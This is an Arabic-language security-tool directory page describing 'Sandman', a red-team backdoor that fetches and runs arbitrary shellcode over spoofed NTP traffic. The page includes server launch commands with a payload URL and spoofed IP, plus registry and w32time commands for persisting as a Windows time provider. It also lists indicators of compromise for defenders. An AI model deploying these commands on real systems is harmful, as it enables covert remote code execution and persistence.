Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/idov31/sandman
توليد الحمولةآليات الاستمراريةشيل كودالقيادة والسيطرةالفريق الأحمر
GitHubidov31/sandman

Sandman

باب خلفي يعتمد على بروتوكول NTP للشبكات المحصنة، يقوم بتسليم وتنفيذ شيلكود عشوائي عبر حركة NTP مزيفة مع إمكانية استمرارية اختيارية كموفر وقت في ويندوز.

عرض المستودع
816111منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ساندمان

Image image image

ساندمان هو باب خلفي مصمم للعمل على الشبكات المحصنة أثناء عمليات الفريق الأحمر.

يعمل ساندمان كمرحّل ويستفيد من NTP (بروتوكول مزامنة الوقت والتاريخ) لجلب وتنفيذ شيلكود عشوائي من خادم مُحدد مسبقًا.

بما أن NTP هو بروتوكول يتم تجاهله من قبل العديد من المدافعين، مما يؤدي إلى سهولة الوصول إلى الشبكة.

الاستخدام

Sandman

خادم ساندمان (الاستخدام)

يعمل على ويندوز / أنظمة يونكس:

root@kitploit:~
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • محول الشبكة: المحول الذي تريد أن يستمع عليه الخادم (مثال: Ethernet لويندوز، eth0 ليونكس).

  • رابط الحمولة: الرابط إلى الشيلكود الخاص بك، قد يكون وكيلك (مثال: CobaltStrike أو meterpreter) أو مرحّل آخر.

  • العنوان IP للتزوير: إذا كنت ترغب في تزوير عنوان IP شرعي (مثال: عنوان time.microsoft.com).

الباب الخلفي لساندمان (الاستخدام)

للبدء، يمكنك ترجمة الباب الخلفي لساندمان كما هو مذكور أدناه، لأنه ملف تنفيذي خفيف بلغة C# يمكنك تشغيله عبر ExecuteAssembly، أو تشغيله كموفر NTP، أو مجرد تنفيذه/حقنه.

موفر وقت الباب الخلفي لساندمان (الاستخدام)

لاستخدامه، ستحتاج إلى اتباع خطوات بسيطة:

  • أضف قيمة التسجيل التالية:
root@kitploit:~
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • أعد تشغيل خدمة w32time:
root@kitploit:~
sc stop w32time
sc start w32time

ملاحظة: تأكد من أنك تترجم باستخدام خيار x64 وليس أي خيار CPU!

القدرات

  • جلب وتنفيذ حمولة عشوائية من خادم يتحكم به المهاجم.

  • يمكن العمل على الشبكات المحصنة لأن NTP عادةً ما يكون مسموحًا به في جدار الحماية.

  • انتحال شخصية خادم NTP شرعي عبر تزوير IP.

الإعداد

خادم ساندمان (الإعداد)

  • بايثون 3.9

  • المتطلبات محددة في ملف requirements.

الباب الخلفي لساندمان (الإعداد)

لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ولكن كما هو مذكور في قسم الاستخدام، يمكن تجميعه باستخدام كل من VS2022 و CSC. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.

موفر وقت الباب الخلفي لساندمان (الإعداد)

لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ستحتاج أيضًا إلى تثبيت DllExport (عبر Nuget أو أي طريقة أخرى) لتجميعه. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.

مؤشرات الاختراق (IOCs)

  • يتم حقن شيلكود في RuntimeBroker.

  • يبدأ اتصال NTP المشبوه برأس سحري معروف.

  • قاعدة YARA.

المساهمون

  • Orca للشيلكود.

  • شكر خاص لـ Tim McGuffin على فكرة موفر الوقت.

شكرًا لمن ساهم بالفعل وسأقبل المساهمات بكل سرور، قم بعمل طلب سحب وسأراجعه!

تنزيل الأداة